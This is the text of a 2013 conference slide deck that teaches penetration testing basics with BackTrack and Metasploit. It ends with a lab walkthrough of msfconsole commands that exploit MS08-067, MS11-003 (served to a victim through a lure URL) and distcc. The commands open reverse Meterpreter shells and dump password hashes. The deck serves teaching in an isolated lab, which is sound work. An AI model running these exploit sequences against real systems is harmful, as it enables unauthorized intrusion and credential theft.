iCrOSS 2013_Pentest

PENETRATION TESTING AND METASPLOIT BASIC

Presented by Syarif

!Indonesia Creative Open Source Software ( ICrOSS ) 2013

Jakarta, April 25 2013 Balai Kartini

Agenda

• Why & What’s Penetration Testing ( Pentest )

• << back|track basic overview

• Information Gathering & Port Scan ( Demo)

• Metasploit Basics & Meterpreter

• Challenge ;)

Whoami

• Just me my self : http://fl3x.us ; @fl3xu5

• InfoSec Enthusiast & Trainer

• Lecture & Assistant Manager

• CyberCrime Investigator

Why Pentest ?

• Millions of dollars have been invested in security programs to protect critical infrastructure to prevent data breaches *1)

• Penetration Test is one of the most effective ways to identify weaknesses and deficiencies in these programs *1)

What’s Penetration Testing

• A method to evaluate the security of computer system / network

• Practice ( attacking ) an IT System like a ‘hacker’ does

• Find security holes ( weaknesses )

• Bypass security mechanism

• Compromise an organization’s IT system security

Must have permission from IT system owner !

illegal activity put you in Jail

Ethics

• Think before act

• Don’t be stupid

• Don’t be malicious

Pentest Phases

Vulnerability Analysis

Information Gathering

Exploitation

Post Exploitation

Reporting

<< back|track overview

• .

The Most Advanced Linux Security Distribution

Open Source & Always be

Developed for Security Professional

Real World Pentesting Tools

<< back|track overview

• Watch the Video ! :)

<< back|track overview

<< back|track overview

What’s

• Not just a tool, but an entire framework *1)

• an Open source platform for writing security tools and exploits *2)

• Easily build attack vectors to add its exploits, payloads, encoders,

• Create and execute more advanced attack

• Ruby based

Metasploit interfaces

• MSFconsole

• MSFcli

• msfweb, msfgui ( discontinued )

• Metasploit Pro, Metasploit Express

• Armitage

MSFconsole

MSFcli

Metasploit Terminology

• Exploit : code that allow a pentester take some advantages of a flaw within system,application, or service *1)

• Payload : code that we want the target system to execute ( few commands to be executed on the target system ) *1)

• Shellcode : a set of instructions used as payload when exploitation occurs *1)

• Module : a software that can be used by metasploit *1)

• Listener : a component for waiting an incoming connection *1)

How does exploitation works

attacker

exploit + payload

vulnerable server

1

exploit run , then payload run2

3 Upload / Download data

Traditional Pentest Vs Metasploit

Public Exploit Gathering

Change offsets

Replace ShellCode

Load Metasploit

Choose the target OS

Use exploit

SET Payload

Execute

Traditional Pentest Metasploit for Pentest

Meterpreter

• as a payload after vulnerability is exploited *1)

• Improve the post exploitation

Meterpreter

Exploiting a vulnerability

Select a meterpreter as a payload

meterpreter shell

Meterpreter command

Meterpreter command

Meterpreter command

Meterpreter command

Meterpreter command

Pentest Scenario

attacker vulnerable OS on VMware

* : Ubuntu 8.04 metasploitable

*

Pentest Skenario

• Set network adapter : NAT

• Firewall & Windows update : OFF

• Fresh OS installed

!

• startx

OS in the Lab• BackTrack 5 R 3

• IP address : 172.16.150.169

• Windows Xp SP 2

• IP address : 172.16.150.165

• Windows 2003 Server

• IP address : 172.16.150.167

• Windows 7

• IP address : 172.16.150.170

• Ubuntu Linux 8.04 ( Metasploitable )

• IP address : 172.16.150.171

Windows XP Exploitation

• msf > search windows/smb

• msf > info exploit/windows/smb/ms08_067_netapi

• msf > use exploit/windows/smb/ms08_067_netapi

• msf exploit(ms08_067_netapi) > show payloads

• msf exploit(ms08_067_netapi) > set PAYLOAD windows/meterpreter/reverse_tcp

• msf exploit(ms08_067_netapi) > show options

• msf exploit(ms08_067_netapi) > set RHOST 172.16.150.165

• msf exploit(ms08_067_netapi) > set LHOST 172.16.150.169

• msf exploit(ms08_067_netapi) > show options

• msf exploit(ms08_067_netapi) > exploit

• meterpreter > background

• session -l

Windows XP Post Exploitation

• session -i 1

• meterpreter > getsystem -h

• getuid

• hashdump

Windows 2003 Server Exploitation

• msf > search windows/smb

• msf > info exploit/windows/smb/ms08_067_netapi

• msf > use exploit/windows/smb/ms08_067_netapi

• msf exploit(ms08_067_netapi) > show payloads

• msf exploit(ms08_067_netapi) > set PAYLOAD windows/meterpreter/reverse_tcp

• msf exploit(ms08_067_netapi) > show options

• msf exploit(ms08_067_netapi) > set RHOST 172.16.150.167

• msf exploit(ms08_067_netapi) > set LHOST 172.16.150.169

• msf exploit(ms08_067_netapi) > show options

• msf exploit(ms08_067_netapi) > exploit

• meterpreter > background

• session -l

Windows 7 Exploitation• msf > use exploit/windows/browser/ms11_003_ie_css_import

• msf exploit(ms11_003_ie_css_import) > set PAYLOAD windows/meterpreter/reverse_tcp

• msf exploit(ms11_003_ie_css_import) > show options

• msf exploit(ms11_003_ie_css_import) > set SRVHOST 172.16.150.169

• msf exploit(ms11_003_ie_css_import) > set SRVPORT 80

• msf exploit(ms11_003_ie_css_import) > set URIPATH miyabi-hot.avi

• msf exploit(ms11_003_ie_css_import) > set LHOST 172.16.150.169

• msf exploit(ms11_003_ie_css_import) > set LPORT 443

• msf exploit(ms11_003_ie_css_import) > exploit

Just wait until the victim open the url http://172.16.150.169:80/miyabi-hot.avi

Windows 7 Exploitation

• msf exploit(ms11_003_ie_css_import) > sessions -l

• msf exploit(ms11_003_ie_css_import) > sessions -i 1

• meterpreter > sysinfo

• meterpreter > shell

Ubuntu 8.04 Metasploitable Exploitation

• search distcc

• use exploit/unix/misc/distcc_exec

• show payloads

• set PAYLOAD cmd/unix/reverse

• show options

• set rhost 172.16.150.171

• set lhost 172.16.150.169

• exploit

Any Question ? Contact me

• Website : http://fl3x.us

• Twitter : @fl3xu5

Greet & Thanks To

• BackTrack Linux

• Metasploit Team ( HD Moore & rapid7 )

• Offensive Security / Metasploit Unleashed

• David Kennedy

• Georgia Weidman

References !

!

• 1. Metasploit The Penetration Tester’s Guide : David Kennedy , Jim O’Gorman, Devon Kearns, Mati Aharoni

• 2. http://www.metasploit.com

• 3. http://www.offensive-security.com/metasploit-unleashed/Main_Page

• 4. http://www.pentest-standard.org/index.php/PTES_Technical_Guidelines

Challenge in 45 minutes :)

• Connect Your Windows OS to TP LINK Access Point over dhcp

• BackTrack 5R3 VMWare setting :

• Network adapter : Bridge

• Get 4 Pictures by your self & shutdown the targets ( if you can :p )

• Win the Polo T-Shirt indobacktrack

Challenge in 45 minutes :)